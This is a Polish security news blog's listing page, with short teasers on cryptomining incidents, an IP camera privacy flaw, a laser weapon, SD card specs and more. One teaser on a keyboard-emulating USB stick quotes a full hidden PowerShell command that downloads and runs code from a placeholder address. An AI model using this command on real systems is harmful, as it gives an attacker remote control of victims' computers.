Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
Chińczycy nieco przekomarzają się z mediami, które z jednej strony sceptycznie były (są?) nastawione do “sensacji”, z drugiej otrzymały w odpowiedzi np. taki film: Jeśli broń (czyli trzykilowy ZKZM-500) rzeczywiście istnieje, to nie ma raczej parametrów wizualnych znany ze Star Wars… po pierwsze promień jest niewidoczny dla ludzkiego oka. To…
Czytaj dalej »Część naszych czytelników na pewno kojarzy przeglądarkę lynx czy jej nowocześniejszą odmianę: links. Sam rozwój lynksa wystartował we wczesnych latach dziewięćdziesiątych i trwa do tej pory(!). Zobaczcie tylko na jakich systemach możecie go śmiało używać: Lynx 2.8.8 runs on Un*x, MacOS, VMS, Windows 95/98/NT, DOS386+ (but not 3.1, 3.11), as well as OS/2…
Czytaj dalej »Deklaracja Niepodległości to jeden z najważniejszych dokumentów w historii powstawania USA, określany niekiedy jako symbol wolności Amerykanów. To właśnie 4 lipca (datę jej ogłoszenia w 1776r.) obchodzi się w Stanach jako Dzień Niepodległości. W dużym skrócie to ogłoszenie niepodległości Stanów (niespodzianka) od Wielkiej Brytanii, podpisane przez takie osobistości jak Benjamin Franklin…
Czytaj dalej »Ciekawostka wakacyjna: niedawno pokazała się nowa specyfikacja znanych nam kart SD. Maksymalna pojemność to 128 TB (obecna specyfikacja przewiduje do 2 TB, choć obecnie bardzo trudno dostać nawet 1 TB kartę). Karty SD Express, poza standardowymi wymiarami i kompatybilnością wsteczną, mają oferować maksymalny, teoretyczny transfer do 985 MB/s – a…
Czytaj dalej »Krótka ciekawostka “ku pokrzepieniu serc”. U nas szykują się nowe parapodatki przy badaniach technicznych samochodów, a w Ugandzie wprowadzają podatek od dostępu do mediów społecznościowych (200 szylingów ugandyjskich ~= 20 groszy dziennie). Donosi o tym Time, pisząc: In addition to the usual data fees, social media users now must pay upfront…
Czytaj dalej »Cenimy Wasz czas. Więc maksymalna kondensacja: Aplikacja mobilna sparowana z kamerą IP firmy Swann ma możliwość podglądnięcia obrazu na żywo “ze swojej kamery”. Szkoda tylko, że nie zawsze “ze swojej“: jedna z użytkowniczek nagle dostała dziwne alerty ruchu w appce, czyli coś pojawiło się w kamerze. Okazało się, że jest…
Czytaj dalej »Zobaczcie hardenize.com – w kilka(naście) sekund otrzymacie raport dotyczący dowolnej domeny, choć informacje mamy tylko w obszarach: DNS, mail (np. brak szyfrowania, problemy z SPF) oraz WWW (problemy z certyfikatami SSL, nagłówkami http, …). Przykład: Nie jest to oczywiście pełny skan bezpieczeństwa Waszej infrastruktury, ale jeśli szybko / tanio można…
Czytaj dalej »Garść informacji o chińskim programie dronów przypominających ptaki (kryptonim Dove). Song Bifeng – główny mózg projektu, pracował wcześniej jako starszy naukowiec przy projekcie “niewidzialnego” myśliwca J-20, a obecny temat idzie również nieźle – właśnie za swój wkład w “Dove” został uhonorowany przez mundurowych z Chińskiej Armii Ludowo-Wyzwoleńczej. Zalet mamy dużo: “ptak” normalnie…
Czytaj dalej »Smutna historia bociana Kajtka. Najpierw polscy miłośnicy przyrody zamontowali na bocianie nadajnik, aby móc śledzić jego trasy przelotu: Jednak w kwietniu tego roku okazało się, że sygnał z nadajnika nagle się urwał. Może awaria? Nie, okazało się, że ktoś w Sudanie wyciągnął z urządzenia kartę SIM i wydzwonił z niej…
Czytaj dalej »W Rosji każdy orze jak może – jedni ogrzewają koparkami kryptowalut mieszkania, inni próbują kopać bitcoiny na superkomputerze służącym do badań nad bronią jądrową – tak przynajmniej donosi BBC i inne media. Rosyjska agencja Interfax potwierdza incydent, choć nie podaje wielu szczegółów (niespodzianka). Cała operacja miała mieć miejsce w mieście…
Czytaj dalej »Dokładnie taką historię opisuje Noah Dinkin – twierdzi, że po skorzystaniu z darmowego WiFi w argentyńskim Starbucksie, strona operatora zapewniającego tą usługę (chodzi tutaj zapewne o captive portal) … kopie walutę na przeglądarce klienta: Czy jest to celowe działanie, czy po prostu zhackowana strona – trudno jednoznacznie odpowiedzieć, Starbucks w każdym…
Czytaj dalej »Są instalacje (koparki) używane do ogrzewania pomieszczeń, są eksperymenty z podłączaniem koparek do turbin wiatrowych, a tym razem na facebookowej grupie Tesla Owners Worldwide umieszczone zostało zdjęcie koparki kryptowalut podpiętej do samochodu. Cały pomysł bazuje na darmowym ładowaniu zapewnianym przez Teslę (Lifetime Unlimited Supercharging), uzupełnionym o dość pojemną baterię (nawet…
Czytaj dalej »…a przynajmniej taki nowy trend próbuje spopularyzować Samsung. Oto koparka Bitcoinów wykonana z 40-stu Samsungów Galaxy S5: Jak to działa? Koreański producent przygotował specjalną wersję systemu operacyjnego, który nadaje się do zastosować w tzw. upcyclingu, czyli w wolnym tłumaczeniu nadania trupom nowego życia ;-) Jaka jest wydajność wspomnianej wyżej koparki? Delikatnie…
Czytaj dalej »Opis przygotowania pendrive, który po podłączeniu działa jak klawiatura. Klawiatura ta z kolei wpisuje zaprogramowaną wcześniej sekwencję klawiszy – np. uruchamia powershella i daje zdalny dostęp na docelowy komputer. Np. tak: Keyboard.println(“powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring(‘http://1.2.3.4:8080/’);”); Keyboard.write(KEY_RETURN); Sercem projektu jest produkt “Adafruit Trinket – Mini Microcontroller” –…
Czytaj dalej »Ostatnio media obiegła dość interesująca informacja o możliwości zsyntetyzowania takiego DNA, które da wykonanie kodu na maszynie, która służy do sekwencjonowania DNA (czyli w pewnym uproszczeniu poznania ciągu liter – odpowiadającym czterem parom nukleotydowym – wchodzących w skład DNA). Autorzy piszą w swojej pracy tak: We demonstrate, for the first time, the…
Czytaj dalej »